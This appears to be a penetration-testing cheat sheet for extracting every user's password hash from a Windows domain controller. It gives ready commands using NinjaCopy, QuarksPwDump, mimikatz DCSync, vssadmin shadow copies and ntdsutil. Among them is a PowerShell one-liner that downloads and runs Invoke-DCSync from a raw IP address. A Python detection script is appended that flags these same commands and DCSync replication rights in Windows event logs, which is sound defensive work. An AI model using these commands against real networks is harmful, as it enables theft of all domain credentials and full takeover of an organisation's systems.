Domain penetration: dumping the Active Directory database (exporting domain controller hashes)
Preface: notes on obtaining the hashes of all users on a Windows domain controller
The NTDS.DIT file is constantly in use by the operating system, so it cannot simply be copied elsewhere to extract information from it. On Windows this file can be found at the following location
NinjaCopy
Tool URL: https://github.com/3gstudent/NinjaCopy
Copy ntds.dit with NinjaCopy
Tool URL: https://github.com/quarkslab/quarkspwdump
Export hashes with quarkspwdump
Repair ntds.dit
esentutl /p /o ntds.dit
Dump the domain hashes
QuarksPwDump.exe -dhb -hist -nt c:\test\ntds.dit -o c:\test\log.txt
powershell_Invoke-DCSync
powershell -exec bypass -command "IEX (New-Object System.Net.Webclient).DownloadString('http://120.79.66.58/mypowershell/Invoke-DCSync.ps1');Invoke-DCSync -PWDumpFormat"
mimikatz
mimikatz.exe privilege::debug "lsadump::dcsync /domain:test.local /all /csv exit"
vssadmin
Export ntds.dit from a vssadmin volume shadow copy
vssadmin list shadows
vssadmin create shadow /for=c:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy65\windows\NTDS\ntds.dit c:\windows\temp\ntds.dit
vssadmin delete shadows /for=c: /quiet
esentutl /p /o c:\windows\temp\ntds.dit
ntdsutil
Export ntds.dit with ntdsutil
ntdsutil
activate instance ntds
ifm
create full C:\ntdsutil
quit
quit
Dump the domain hashes
QuarksPwDump.exe -dhb -hist -nt c:\test\ntds.dit -o c:\test\log.txt
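As an added example (not part of the original notes), a small Python detection helper that flags the traces these techniques leave in Windows security auditing: 4688 process-creation command lines for the vssadmin / ntdsutil / esentutl / QuarksPwDump steps, and 4662 directory-service access carrying the replication extended rights that lsadump::dcsync and Invoke-DCSync rely on. The flattened event shape (EventID, CommandLine, SubjectUserName, Properties) and the sample events are constructed assumptions; the two replication GUIDs are the documented Windows values.

```python
import re

# Extended-right GUIDs that appear in the "Properties" of event 4662 when an
# account requests directory replication. Documented Windows values.
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
}

# Command-line patterns for the on-disk copy / repair / extract steps above.
CMDLINE_RULES = [
    ("vssadmin shadow copy creation", re.compile(r"vssadmin.*create\s+shadow", re.I)),
    ("ntdsutil IFM media creation", re.compile(r"ntdsutil.*\bifm\b", re.I)),
    ("ntds.dit read from shadow copy device",
     re.compile(r"HarddiskVolumeShadowCopy\d+\\.*ntds\.dit", re.I)),
    ("esentutl repair of ntds.dit", re.compile(r"esentutl.*/p\b.*ntds\.dit", re.I)),
    ("offline hash extraction", re.compile(r"QuarksPwDump.*-dhb", re.I)),
]

def classify(event: dict) -> list:
    """Return the rule names an event matches (empty list if nothing matched).
    Assumed flattened shape: EventID, CommandLine, SubjectUserName, Properties."""
    hits = []
    if event.get("EventID") == 4688:
        for name, pattern in CMDLINE_RULES:
            if pattern.search(event.get("CommandLine", "")):
                hits.append(name)
    elif event.get("EventID") == 4662:
        guids = {g.strip("{}").lower() for g in event.get("Properties", [])}
        # DC computer accounts (names ending in $) replicate legitimately;
        # the same rights exercised by a user account are the DCSync signal.
        if guids & REPLICATION_GUIDS and not event.get("SubjectUserName", "").endswith("$"):
            hits.append("DCSync-style replication by a non-DC account")
    return hits

def scan(events: list) -> dict:
    """Map event index -> matched rule names for every event that triggered."""
    return {i: h for i, e in enumerate(events) if (h := classify(e))}

# Constructed sample events mirroring the commands in the notes above.
SAMPLE_EVENTS = [
    {"EventID": 4688, "CommandLine": "vssadmin create shadow /for=c:"},
    {"EventID": 4688, "CommandLine": r"copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy65\windows\NTDS\ntds.dit c:\windows\temp\ntds.dit"},
    {"EventID": 4688, "CommandLine": r"esentutl /p /o c:\windows\temp\ntds.dit"},
    {"EventID": 4688, "CommandLine": "vssadmin list shadows"},  # listing alone: not flagged
    {"EventID": 4662, "SubjectUserName": "jdoe", "Properties": ["{1131F6AD-9C07-11D1-F79F-00C04FC2DCD2}"]},
    {"EventID": 4662, "SubjectUserName": "DC02$", "Properties": ["{1131F6AD-9C07-11D1-F79F-00C04FC2DCD2}"]},
    {"EventID": 4688, "CommandLine": r"QuarksPwDump.exe -dhb -hist -nt c:\test\ntds.dit -o c:\test\log.txt"},
]
```

Running scan(SAMPLE_EVENTS) flags events 0, 1, 2, 4 and 6; the benign listing and the DC-to-DC replication stay silent.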